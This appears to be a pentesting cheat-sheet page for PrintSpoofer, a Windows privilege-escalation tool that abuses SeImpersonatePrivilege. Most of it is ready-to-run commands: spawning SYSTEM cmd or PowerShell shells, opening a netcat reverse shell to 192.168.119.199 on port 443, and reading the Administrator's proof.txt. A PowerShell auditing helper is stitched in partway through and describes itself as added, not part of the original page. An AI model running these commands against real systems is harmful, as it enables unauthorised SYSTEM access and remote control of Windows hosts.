>_ shadow.red

PrintSpoofer (SeImpersonatePrivilege)


Verify the privilege

whoami /priv

Look for SeImpersonatePrivilege listed as Enabled.
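
A scripted form of the check above, useful when auditing which accounts hold the privilege. This is an added example, not code from the original page or from the PrintSpoofer project; the function name Get-PrivilegeState and the sample rows are constructed for illustration.

```powershell
# Added example: classify a privilege from "whoami /priv /fo csv" output.
# Get-PrivilegeState is a hypothetical helper name, not a built-in cmdlet.
function Get-PrivilegeState {
    param(
        [Parameter(Mandatory)][string[]]$CsvLines,   # lines from: whoami /priv /fo csv
        [string]$Privilege = 'SeImpersonatePrivilege'
    )
    # Keep only data rows (privilege names start with "Se") and supply fixed
    # column names, so the lookup does not depend on the header text, which
    # is localised on non-English systems.
    $rows = $CsvLines | Where-Object { $_ -match '^"Se' } |
        ConvertFrom-Csv -Header 'Name', 'Description', 'State'
    $row = $rows | Where-Object { $_.Name -eq $Privilege } | Select-Object -First 1

    [pscustomobject]@{
        Privilege = $Privilege
        # A privilege listed as Disabled is still present in the token and can
        # be enabled by the process, so only a missing row means "not held".
        Held      = [bool]$row
        # State text comes straight from whoami (Enabled/Disabled in English).
        State     = if ($row) { $row.State } else { 'Absent' }
    }
}

# Constructed sample input, shaped like the CSV output for a service account.
$sample = @(
    '"Privilege Name","Description","State"'
    '"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"'
    '"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"'
    '"SeCreateGlobalPrivilege","Create global objects","Enabled"'
    '"SeIncreaseWorkingSetPrivilege","Increase a process working set","Disabled"'
)

Get-PrivilegeState -CsvLines $sample
Get-PrivilegeState -CsvLines $sample -Privilege 'SeDebugPrivilege'

# Live use on the host being audited:
# Get-PrivilegeState -CsvLines (whoami /priv /fo csv)
```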

Interactive shell

.\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c powershell

Reverse shell

.\PrintSpoofer64.exe -c "c:\Tasks\nc.exe 192.168.119.199 443 -e cmd"

Read a protected file

PrintSpoofer.exe -c "cmd /c type c:\users\Administrator\Desktop\proof.txt"

Reference

https://github.com/itm4n/PrintSpoofer